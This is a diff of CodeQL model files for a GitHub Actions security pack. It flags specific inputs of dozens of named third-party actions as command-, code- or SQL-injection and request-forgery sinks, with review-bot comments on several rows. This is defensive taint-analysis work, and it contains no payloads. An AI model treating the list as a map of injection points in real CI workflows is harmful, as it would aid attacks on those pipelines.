b/ql/lib/ext/cycjimmy_semantic-release-action.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cycjimmy/semantic-release-action", "*", "input.semantic_version", "command-injection"] + - ["cycjimmy/semantic-release-action", "*", "input.extra_plugins", "command-injection"] + - ["cycjimmy/semantic-release-action", "*", "input.extends", "command-injection"] diff --git a/ql/lib/ext/cypress-io_github-action.model.yml b/ql/lib/ext/cypress-io_github-action.model.yml new file mode 100644 index 000000000000..2fda092f20a5 --- /dev/null +++ b/ql/lib/ext/cypress-io_github-action.model.yml 
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sourceModel
+ data:
+ - ["cypress-io/github-action", "*", "env.GH_BRANCH", "pull_request_target", "PR branch"]
diff --git a/ql/lib/ext/dailydotdev_action-devcard.model.yml b/ql/lib/ext/dailydotdev_action-devcard.model.yml
new file mode 100644
index 000000000000..324171f3c4b0
--- /dev/null
+++ b/ql/lib/ext/dailydotdev_action-devcard.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["dailydotdev/action-devcard", "*", "input.commit_branch", "sql-injection"]
+ - ["dailydotdev/action-devcard", "*", "input.commit_filename", "sql-injection"]
diff --git a/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml b/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml
new file mode 100644
index 000000000000..cc5c311eea73
--- /dev/null
+++ b/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["danielpalme/reportgenerator-github-action", "*", "input.toolpath", "command-injection"]
diff --git a/ql/lib/ext/daspn_private-actions-checkout.model.yml b/ql/lib/ext/daspn_private-actions-checkout.model.yml
new file mode 100644
index 000000000000..f45aae02158d
--- /dev/null
+++ b/ql/lib/ext/daspn_private-actions-checkout.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["daspn/private-actions-checkout", "*", "input.actions_list", "command-injection"]
+ - ["daspn/private-actions-checkout", "*", "input.checkout_base_path", "command-injection"]
diff --git a/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml b/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml
new file mode 100644
index 000000000000..7445d673fcf7
--- /dev/null
+++ b/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml
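Review bot: The source is keyed on an environment variable, `env.GH_BRANCH`, rather than an action output, and that name is generic enough that a workflow may export its own `GH_BRANCH` for unrelated reasons; unless the pack scopes `env.*` sources to steps that actually use `cypress-io/github-action`, this row can taint unrelated values, or miss the real one if the action exposes the branch under a different name. Please confirm from the action's source where `GH_BRANCH` is written and make the description column carry that reasoning, e.g. `PR head branch exported by the action; attacker-controlled on pull_request_target`, so a reader does not have to rediscover why it is untrusted.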
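Review bot: `sql-injection` is the only occurrence of that sink kind in this commit, and `input.commit_branch` / `input.commit_filename` name values that a commit-and-push action would normally hand to `git`, not to a database; if the action shells out with these inputs the kind should be `command-injection`, and if no query in the pack consumes `sql-injection` these two rows produce nothing at all. Please check the action's implementation and either correct the kind or add a comment pinning down the actual sink, e.g. `# interpolated into a SQL statement by the action — see <file> in the action repo`.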
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dawidd6/action-ansible-playbook", "*", "input.playbook", "command-injection"] + - ["dawidd6/action-ansible-playbook", "*", "input.options", "command-injection"] diff --git a/ql/lib/ext/dawidd6_action-download-artifact.model.yml b/ql/lib/ext/dawidd6_action-download-artifact.model.yml new file mode 100644 index 000000000000..a8a54dbda292 --- /dev/null +++ b/ql/lib/ext/dawidd6_action-download-artifact.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sourceModel + data: + - ["dawidd6/action-download-artifact", "*", "output.artifacts", "*", "Artifact details"] diff --git a/ql/lib/ext/delaguardo_setup-clojure.model.yml b/ql/lib/ext/delaguardo_setup-clojure.model.yml index 2aa6013c872a..82f491390d2e 100644 --- a/ql/lib/ext/delaguardo_setup-clojure.model.yml +++ b/ql/lib/ext/delaguardo_setup-clojure.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["delaguardo/setup-clojure", "*", "input.boot", "env.BOOT_VERSION", "taint"] + - ["delaguardo/setup-clojure", "*", "input.boot", "env.BOOT_VERSION", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml b/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml new file mode 100644 index 000000000000..430a96f6cbef --- /dev/null +++ b/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml 
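Review bot: The description column for the new source reads only `Artifact details`, which does not say why `output.artifacts` is untrusted, whereas the other sources in this commit tie the value to a trigger (`PR title`, `PR branch`) and to `pull_request_target`. Here the event column is `*`, which is defensible — an artifact downloaded from another workflow run may have been produced by a run triggered from an untrusted fork PR regardless of the consuming workflow's trigger — but that rationale should be in the row, e.g. `Metadata of artifacts produced by another run, possibly an untrusted PR build`. Note that this models only the action's output; the downloaded artifact files on disk are the more dangerous untrusted input and, if the pack cannot express them, that gap is worth a comment.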
@@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["determinatesystems/magic-nix-cache-action", "*", "input.source-url", "command-injection"] + - ["determinatesystems/magic-nix-cache-action", "*", "input.source-tag", "command-injection"] + - ["determinatesystems/magic-nix-cache-action", "*", "input.source-pr", "command-injection"] + - ["determinatesystems/magic-nix-cache-action", "*", "input.source-branch", "command-injection"] + - ["determinatesystems/magic-nix-cache-action", "*", "input.source-revision", "command-injection"] + - ["determinatesystems/magic-nix-cache-action", "*", "input.source-binary", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/docker-practice_actions-setup-docker.model.yml b/ql/lib/ext/docker-practice_actions-setup-docker.model.yml new file mode 100644 index 000000000000..37bcf2cc7815 --- /dev/null +++ b/ql/lib/ext/docker-practice_actions-setup-docker.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["docker-practice/actions-setup-docker", "*", "input.docker_version", "command-injection"] + - ["docker-practice/actions-setup-docker", "*", "input.docker_channel", "command-injection"] + - ["docker-practice/actions-setup-docker", "*", "input.docker_daemon_json", "command-injection"] diff --git a/ql/lib/ext/docker_build-push-action.model.yml b/ql/lib/ext/docker_build-push-action.model.yml new file mode 100644 index 000000000000..77eaf3ae10f8 --- /dev/null +++ b/ql/lib/ext/docker_build-push-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["docker/build-push-action", "*", "input.context", "code-injection"] \ No newline at end of file diff --git a/ql/lib/ext/endbug_latest-tag.model.yml b/ql/lib/ext/endbug_latest-tag.model.yml new file mode 100644 index 000000000000..63cdb2a496b0 --- /dev/null 
+++ b/ql/lib/ext/endbug_latest-tag.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["endbug/latest-tag", "*", "input.ref", "command-injection"] + - ["endbug/latest-tag", "*", "input.tag-name", "command-injection"] + - ["endbug/latest-tag", "*", "input.git-directory", "command-injection"] + - ["endbug/latest-tag", "*", "input.description", "command-injection"] diff --git a/ql/lib/ext/expo_expo-github-action.model.yml b/ql/lib/ext/expo_expo-github-action.model.yml new file mode 100644 index 000000000000..d0bcbb4da989 --- /dev/null +++ b/ql/lib/ext/expo_expo-github-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["expo/expo-github-action", "*", "input.command", "command-injection"] + - ["expo/expo-github-action", "*", "input.packager", "command-injection"] diff --git a/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml b/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml new file mode 100644 index 000000000000..6418e71f22a4 --- /dev/null +++ b/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["firebaseextended/action-hosting-deploy", "*", "input.firebaseToolsVersion", "command-injection"] diff --git a/ql/lib/ext/gabrielbb_xvfb-action.model.yml b/ql/lib/ext/gabrielbb_xvfb-action.model.yml new file mode 100644 index 000000000000..86705319e23d --- /dev/null +++ b/ql/lib/ext/gabrielbb_xvfb-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["gabrielbb/xvfb-action", "*", "input.run", "command-injection"] + - ["gabrielbb/xvfb-action", "*", "input.options", "command-injection"] \ No newline at end of file 
diff --git a/ql/lib/ext/game-ci_unity-builder.model.yml b/ql/lib/ext/game-ci_unity-builder.model.yml new file mode 100644 index 000000000000..61fdcd9254a4 --- /dev/null +++ b/ql/lib/ext/game-ci_unity-builder.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["game-ci/unity-builder", "*", "input.cacheKey", "command-injection"] + - ["game-ci/unity-builder", "*", "input.unityHubVersionOnMac", "command-injection"] diff --git a/ql/lib/ext/game-ci_unity-test-runner.model.yml b/ql/lib/ext/game-ci_unity-test-runner.model.yml index ab413b6e9759..2d142d98099b 100644 --- a/ql/lib/ext/game-ci_unity-test-runner.model.yml +++ b/ql/lib/ext/game-ci_unity-test-runner.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["game-ci/unity-test-runner", "*", "input.artifactsPath", "output.artifactsPath", "taint"] + - ["game-ci/unity-test-runner", "*", "input.artifactsPath", "output.artifactsPath", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml b/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml new file mode 100644 index 000000000000..1727ca60e258 --- /dev/null +++ b/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["gautamkrishnar/blog-post-workflow", "*", "input.item_exec", "code-injection"] \ No newline at end of file diff --git a/ql/lib/ext/go-semantic-release_action.model.yml b/ql/lib/ext/go-semantic-release_action.model.yml new file mode 100644 index 000000000000..146f4a17a559 --- /dev/null +++ b/ql/lib/ext/go-semantic-release_action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["go-semantic-release/action", "*", "input.bin", "command-injection"] 
diff --git a/ql/lib/ext/golangci_golangci-lint-action.model.yml b/ql/lib/ext/golangci_golangci-lint-action.model.yml new file mode 100644 index 000000000000..8c0f7a5ad614 --- /dev/null +++ b/ql/lib/ext/golangci_golangci-lint-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["golangci/golangci-lint-action", "*", "input.version", "command-injection"] diff --git a/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml b/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml new file mode 100644 index 000000000000..9c7c03b9f357 --- /dev/null +++ b/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["gonuit/heroku-docker-deploy", "*", "input.email", "command-injection"] + - ["gonuit/heroku-docker-deploy", "*", "input.heroku_api_key", "command-injection"] diff --git a/ql/lib/ext/goreleaser_goreleaser-action.model.yml b/ql/lib/ext/goreleaser_goreleaser-action.model.yml new file mode 100644 index 000000000000..9d9eac38af01 --- /dev/null +++ b/ql/lib/ext/goreleaser_goreleaser-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["goreleaser/goreleaser-action", "*", "input.args", "command-injection"] diff --git a/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml b/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml new file mode 100644 index 000000000000..4c74301d1c35 --- /dev/null +++ b/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml 
@@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["gr2m/create-or-update-pull-request-action", "*", "input.branch", "command-injection"] + - ["gr2m/create-or-update-pull-request-action", "*", "input.path", "command-injection"] + - ["gr2m/create-or-update-pull-request-action", "*", "input.commit-message", "command-injection"] + - ["gr2m/create-or-update-pull-request-action", "*", "input.author", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml b/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml new file mode 100644 index 000000000000..6332cbfdad8e --- /dev/null +++ b/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ilammy/msvc-dev-cmd", "*", "input.vsversion", "command-injection"] + - ["ilammy/msvc-dev-cmd", "*", "input.arch", "command-injection"] + - ["ilammy/msvc-dev-cmd", "*", "input.sdk", "command-injection"] + - ["ilammy/msvc-dev-cmd", "*", "input.toolset", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/ilammy_setup-nasm.model.yml b/ql/lib/ext/ilammy_setup-nasm.model.yml new file mode 100644 index 000000000000..f8b8490c2135 --- /dev/null +++ b/ql/lib/ext/ilammy_setup-nasm.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ilammy/setup-nasm", "*", "input.version", "command-injection"] + - ["ilammy/setup-nasm", "*", "input.destination", "command-injection"] diff --git a/ql/lib/ext/imjohnbo_issue-bot.model.yml b/ql/lib/ext/imjohnbo_issue-bot.model.yml new file mode 100644 index 000000000000..64024ef5c72d --- /dev/null +++ b/ql/lib/ext/imjohnbo_issue-bot.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["imjohnbo/issue-bot", "*", "input.body", "code-injection"] + - ["imjohnbo/issue-bot", "*", "input.linked-comments-previous-issue-text", "code-injection"] + - ["imjohnbo/issue-bot", "*", "input.linked-comments-new-issue-text", "code-injection"] \ No newline at end of file diff --git a/ql/lib/ext/iterative_setup-cml.model.yml b/ql/lib/ext/iterative_setup-cml.model.yml new file mode 100644 index 000000000000..1771ac2bad05 --- /dev/null +++ b/ql/lib/ext/iterative_setup-cml.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["iterative/setup-cml", "*", "input.version", "command-injection"] diff --git a/ql/lib/ext/iterative_setup-dvc.model.yml b/ql/lib/ext/iterative_setup-dvc.model.yml new file mode 100644 index 000000000000..e8600c6f7df5 --- /dev/null +++ b/ql/lib/ext/iterative_setup-dvc.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["iterative/setup-dvc", "*", "input.version", "command-injection"] diff --git a/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml b/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml new file mode 100644 index 000000000000..2ab70905db16 --- /dev/null +++ b/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml 
@@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["jamesives/github-pages-deploy-action", "*", "input.branch", "command-injection"] + - ["jamesives/github-pages-deploy-action", "*", "input.commit-message", "command-injection"] + - ["jamesives/github-pages-deploy-action", "*", "input.git-config-email", "command-injection"] + - ["jamesives/github-pages-deploy-action", "*", "input.git-config-name", "command-injection"] + - ["jamesives/github-pages-deploy-action", "*", "input.target-folder", "command-injection"] + - ["jamesives/github-pages-deploy-action", "*", "input.tag", "command-injection"] diff --git a/ql/lib/ext/johnnymorganz_stylua-action.model.yml b/ql/lib/ext/johnnymorganz_stylua-action.model.yml new file mode 100644 index 000000000000..948be24b45cd --- /dev/null +++ b/ql/lib/ext/johnnymorganz_stylua-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["johnnymorganz/stylua-action", "*", "input.args", "command-injection"] diff --git a/ql/lib/ext/jurplel_install-qt-action.model.yml b/ql/lib/ext/jurplel_install-qt-action.model.yml new file mode 100644 index 000000000000..928c1f918d3f --- /dev/null +++ b/ql/lib/ext/jurplel_install-qt-action.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["jurplel/install-qt-action", "*", "input.version", "command-injection"] + - ["jurplel/install-qt-action", "*", "input.arch", "command-injection"] + - ["jurplel/install-qt-action", "*", "input.dir", "command-injection"] + - ["jurplel/install-qt-action", "*", "input.aqtversion", "command-injection"] + - ["jurplel/install-qt-action", "*", "input.py7zrversion", "command-injection"] + - ["jurplel/install-qt-action", "*", "input.extra", "command-injection"] 
diff --git a/ql/lib/ext/jwalton_gh-ecr-push.model.yml b/ql/lib/ext/jwalton_gh-ecr-push.model.yml index b237ac313d2a..ad95f1f323a7 100644 --- a/ql/lib/ext/jwalton_gh-ecr-push.model.yml +++ b/ql/lib/ext/jwalton_gh-ecr-push.model.yml @@ -4,3 +4,10 @@ extensions: extensible: summaryModel data: - ["jwalton/gh-ecr-push", "*", "input.image", "output.imageUrl", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["jwalton/gh-ecr-push", "*", "input.image", "command-injection"] + - ["jwalton/gh-ecr-push", "*", "input.local-image", "command-injection"] + - ["jwalton/gh-ecr-push", "*", "input.region", "command-injection"] diff --git a/ql/lib/ext/leafo_gh-actions-lua.model.yml b/ql/lib/ext/leafo_gh-actions-lua.model.yml new file mode 100644 index 000000000000..b3cb5aa39407 --- /dev/null +++ b/ql/lib/ext/leafo_gh-actions-lua.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["leafo/gh-actions-lua", "*", "input.luaVersion", "command-injection"] + - ["leafo/gh-actions-lua", "*", "input.luaCompileFlags", "command-injection"] diff --git a/ql/lib/ext/leafo_gh-actions-luarocks.model.yml b/ql/lib/ext/leafo_gh-actions-luarocks.model.yml new file mode 100644 index 000000000000..a84880cfdf10 --- /dev/null +++ b/ql/lib/ext/leafo_gh-actions-luarocks.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["leafo/gh-actions-luarocks", "*", "input.withLuaPath", "command-injection"] diff --git a/ql/lib/ext/lucasbento_auto-close-issues.model.yml b/ql/lib/ext/lucasbento_auto-close-issues.model.yml new file mode 100644 index 000000000000..f32484a4f0d3 --- /dev/null +++ b/ql/lib/ext/lucasbento_auto-close-issues.model.yml 
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["lucasbento/auto-close-issues", "*", "input.issue-close-message", "code-injection"]
\ No newline at end of file
diff --git a/ql/lib/ext/magefile_mage-action.model.yml b/ql/lib/ext/magefile_mage-action.model.yml
new file mode 100644
index 000000000000..9ce43e68a757
--- /dev/null
+++ b/ql/lib/ext/magefile_mage-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["magefile/mage-action", "*", "input.args", "command-injection"]
diff --git a/ql/lib/ext/maierj_fastlane-action.model.yml b/ql/lib/ext/maierj_fastlane-action.model.yml
new file mode 100644
index 000000000000..ac3aaa67def0
--- /dev/null
+++ b/ql/lib/ext/maierj_fastlane-action.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["maierj/fastlane-action", "*", "input.lane", "command-injection"]
+ - ["maierj/fastlane-action", "*", "input.options", "command-injection"]
+ - ["maierj/fastlane-action", "*", "input.env", "command-injection"]
diff --git a/ql/lib/ext/manusa_actions-setup-minikube.model.yml b/ql/lib/ext/manusa_actions-setup-minikube.model.yml
new file mode 100644
index 000000000000..90fd673c705b
--- /dev/null
+++ b/ql/lib/ext/manusa_actions-setup-minikube.model.yml
@@ -0,0 +1,9 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["manusa/actions-setup-minikube", "*", "input.kubernetes_version", "command-injection"]
+ - ["manusa/actions-setup-minikube", "*", "input.driver", "command-injection"]
+ - ["manusa/actions-setup-minikube", "*", "input.container_runtime", "command-injection"]
+ - ["manusa/actions-setup-minikube", "*", "input.start_args", "command-injection"]
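Review bot: This model file is committed without a trailing newline (`\ No newline at end of file`), and so are the msys2, mr-smithers-excellent, skitionek, stackhawk, tibdex, tripss and zaproxy_action-baseline models further down, while the tj-actions hunk below changes nothing except stripping its final newline. The extension files are otherwise uniform, so an `insert_final_newline = true` rule in `.editorconfig` (or one formatter pass) would keep them consistent and avoid whitespace-only hunks in later commits.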
diff --git a/ql/lib/ext/mattdavis0351_actions.model.yml b/ql/lib/ext/mattdavis0351_actions.model.yml
index 91741f587063..2c9f46b46f45 100644
--- a/ql/lib/ext/mattdavis0351_actions.model.yml
+++ b/ql/lib/ext/mattdavis0351_actions.model.yml
@@ -5,3 +5,12 @@ extensions:
 data:
 - ["mattdavis0351/actions", "*", "input.image-name", "output.imageUrl", "taint"]
 - ["mattdavis0351/actions", "*", "input.tag", "output.imageUrl", "taint"]
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["mattdavis0351/actions", "*", "input.repo-token", "command-injection"]
+ - ["mattdavis0351/actions", "*", "input.dockerfile-location", "command-injection"]
+ - ["mattdavis0351/actions", "*", "input.image-name", "command-injection"]
+ - ["mattdavis0351/actions", "*", "input.dockerfile-name", "command-injection"]
+ - ["mattdavis0351/actions", "*", "input.tag", "command-injection"]
diff --git a/ql/lib/ext/meteorengineer_setup-meteor.model.yml b/ql/lib/ext/meteorengineer_setup-meteor.model.yml
new file mode 100644
index 000000000000..1bcf8e7ce7ab
--- /dev/null
+++ b/ql/lib/ext/meteorengineer_setup-meteor.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["meteorengineer/setup-meteor", "*", "input.meteor-release", "command-injection"]
diff --git a/ql/lib/ext/microsoft_setup-msbuild.model.yml b/ql/lib/ext/microsoft_setup-msbuild.model.yml
new file mode 100644
index 000000000000..817067445681
--- /dev/null
+++ b/ql/lib/ext/microsoft_setup-msbuild.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["microsoft/setup-msbuild", "*", "input.vs-version", "command-injection"]
+ - ["microsoft/setup-msbuild", "*", "input.vswhere-path", "command-injection"]
diff --git a/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml b/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml
new file mode 100644
index 000000000000..aeca6db0d98d
--- /dev/null
+++ b/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml
@@ -0,0 +1,16 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.tags", "command-injection"]
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.buildArgs", "command-injection"]
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.labels", "command-injection"]
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.target", "command-injection"]
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.directory", "command-injection"]
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.platform", "command-injection"]
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.image", "command-injection"]
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.registry", "command-injection"]
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.dockerfile", "command-injection"]
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.githubOrg", "command-injection"]
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.username", "command-injection"]
\ No newline at end of file
diff --git a/ql/lib/ext/msys2_setup-msys2.model.yml b/ql/lib/ext/msys2_setup-msys2.model.yml
new file mode 100644
index 000000000000..b9358bd2d69a
--- /dev/null
+++ b/ql/lib/ext/msys2_setup-msys2.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["msys2/setup-msys2", "*", "input.install", "command-injection"]
+ - ["msys2/setup-msys2", "*", "input.pacboy", "command-injection"]
\ No newline at end of file
diff --git a/ql/lib/ext/mxschmitt_action-tmate.model.yml b/ql/lib/ext/mxschmitt_action-tmate.model.yml
new file mode 100644
index 000000000000..a18319954e3b
--- /dev/null
+++ b/ql/lib/ext/mxschmitt_action-tmate.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["mxschmitt/action-tmate", "*", "input.tmate-server-rsa-fingerprint", "command-injection"]
+ - ["mxschmitt/action-tmate", "*", "input.tmate-server-ed25519-fingerprint", "command-injection"]
diff --git a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml
index 3db3e9cf66c0..f46c40a8f9cb 100644
--- a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml
+++ b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml
@@ -4,3 +4,9 @@ extensions:
 extensible: summaryModel
 data:
 - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "env.EMSDK", "taint"]
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "command-injection"]
+ - ["mymindstorm/setup-emsdk", "*", "input.version", "command-injection"]
diff --git a/ql/lib/ext/nanasess_setup-chromedriver.model.yml b/ql/lib/ext/nanasess_setup-chromedriver.model.yml
new file mode 100644
index 000000000000..219de80c39e2
--- /dev/null
+++ b/ql/lib/ext/nanasess_setup-chromedriver.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["nanasess/setup-chromedriver", "*", "input.chromedriver-version", "command-injection"]
diff --git a/ql/lib/ext/nanasess_setup-php.model.yml b/ql/lib/ext/nanasess_setup-php.model.yml
new file mode 100644
index 000000000000..dc3c2739e87f
--- /dev/null
+++ b/ql/lib/ext/nanasess_setup-php.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["nanasess/setup-php", "*", "input.php-version", "command-injection"]
diff --git a/ql/lib/ext/nick-fields_retry.model.yml b/ql/lib/ext/nick-fields_retry.model.yml
new file mode 100644
index 000000000000..30679750f131
--- /dev/null
+++ b/ql/lib/ext/nick-fields_retry.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["nick-fields/retry", "*", "input.on_retry_command", "command-injection"]
+ - ["nick-fields/retry", "*", "input.new_command_on_retry", "command-injection"]
+ - ["nick-fields/retry", "*", "input.command", "command-injection"]
diff --git a/ql/lib/ext/octokit_graphql-action.model.yml b/ql/lib/ext/octokit_graphql-action.model.yml
new file mode 100644
index 000000000000..c600e7a93b64
--- /dev/null
+++ b/ql/lib/ext/octokit_graphql-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["octokit/graphql-action", "*", "input.query", "request-forgery"]
diff --git a/ql/lib/ext/octokit_request-action.model.yml b/ql/lib/ext/octokit_request-action.model.yml
new file mode 100644
index 000000000000..ed9088c9f568
--- /dev/null
+++ b/ql/lib/ext/octokit_request-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["octokit/request-action", "*", "input.route", "request-forgery"]
diff --git a/ql/lib/ext/olafurpg_setup-scala.model.yml b/ql/lib/ext/olafurpg_setup-scala.model.yml
new file mode 100644
index 000000000000..988c3d5e674f
--- /dev/null
+++ b/ql/lib/ext/olafurpg_setup-scala.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
